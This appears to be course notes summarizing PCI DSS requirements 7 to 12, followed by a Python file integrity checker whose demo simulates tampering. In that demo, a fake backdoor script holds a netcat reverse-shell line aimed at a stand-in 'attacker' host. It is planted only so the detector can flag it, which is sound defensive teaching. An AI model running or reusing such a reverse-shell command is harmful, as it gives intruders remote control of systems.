This final video contains part 2 of the in-depth look at the PCI DSS requirements as well as a summary of the module. Requirements 7-12 consist of:
- Requirement 7: Restrict access to cardholder data. Implement the principles of least privilege and need-to-know, so that a user or process can reach only the data its job function requires.
- Requirement 8: Assign a unique identifier to each person with computer access to the network. This makes authentication possible and makes every action in the audit trail attributable to one individual. Authenticate using something you know (password), something you have (token), or something you are (biometrics), and require multi-factor authentication for extra strength. Stored passwords must be rendered unreadable with strong cryptography, in practice a salted one-way hash rather than reversible encryption, so that a stolen credential store does not yield the passwords themselves.
- Requirement 9: Restrict physical access to cardholder data via physical controls. Maintain physical security policies, log visitors, use badges, implement a "clean desk" policy, and restrict removable media such as thumb drives that can be used for data exfiltration.
- Requirement 10: Track and monitor all access to network resources and cardholder data. Maintain an audit trail for all data access and secure the logs so they cannot be modified or deleted. And most importantly, periodically review the logs for suspicious behavior!
- Requirement 11: Regularly test security systems and processes. Perform internal and external penetration testing. Deploy file integrity checks to alert on unauthorized modification of critical system files and other sensitive files.
- Requirement 12: Maintain a policy that addresses information security for both employees and contractors.
The video concludes by pointing out the threats posed by social engineering. Humans are often the most vulnerable piece of an organization, and they need to be educated about the risks they face. The overriding principle is: trust no one!
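The file integrity check mentioned under Requirement 11 is simple enough to show end to end. The following is an added example, not code from the video or the course: it records a baseline of SHA-256 digests for every regular file under a directory, then compares a later snapshot against that baseline and reports what was modified, added, or removed. The directory layout, file names and "tampering" steps in `demo()` are constructed for the example; real deployments would point `build_baseline` at system and application directories and store the baseline somewhere an attacker who gains write access to the monitored host cannot also alter it.

```python
"""Baseline-and-compare file integrity check (added example, not the course's code)."""
import hashlib
import tempfile
from pathlib import Path


def hash_file(path: Path, chunk_size: int = 65536) -> str:
    """Return the SHA-256 hex digest of a file, reading it in chunks so
    large binaries do not have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> dict[str, str]:
    """Map each regular file under root (relative path) to its digest.
    Symlinks are skipped so a link pointing outside root is not hashed."""
    baseline: dict[str, str] = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and not path.is_symlink():
            baseline[path.relative_to(root).as_posix()] = hash_file(path)
    return baseline


def compare(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Diff two snapshots. Any file in 'modified' or 'added' under a directory
    that should be static (e.g. binaries, config) is an alert condition."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def demo() -> dict[str, list[str]]:
    """Build a constructed directory, take a baseline, simulate an intrusion,
    and return the detected changes."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc").mkdir()
        (root / "bin").mkdir()
        # Constructed sample files standing in for config and a server binary.
        (root / "etc" / "app.conf").write_text("db_host=10.0.0.5\n")
        (root / "etc" / "readme.txt").write_text("unchanged\n")
        (root / "bin" / "server").write_bytes(b"\x7fELF original binary")

        baseline = build_baseline(root)

        # Simulated tampering (constructed for the example): a binary is
        # replaced, a config file is deleted, and a new script appears.
        (root / "bin" / "server").write_bytes(b"\x7fELF trojaned binary")
        (root / "etc" / "app.conf").unlink()
        (root / "etc" / "backdoor.sh").write_text("#!/bin/sh\nnc -e /bin/sh attacker 4444\n")

        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    for category, files in demo().items():
        print(f"{category}: {files}")
```

In the demo the comparison flags `bin/server` as modified, `etc/backdoor.sh` as added and `etc/app.conf` as removed, while `etc/readme.txt` stays silent. Two caveats a practitioner would add: the baseline must be refreshed through a controlled change process (otherwise every legitimate patch is an alert and the alerts get ignored), and the baseline itself must be protected, for example signed or kept on a separate host, because an attacker with write access to both the files and the baseline can simply re-hash after tampering.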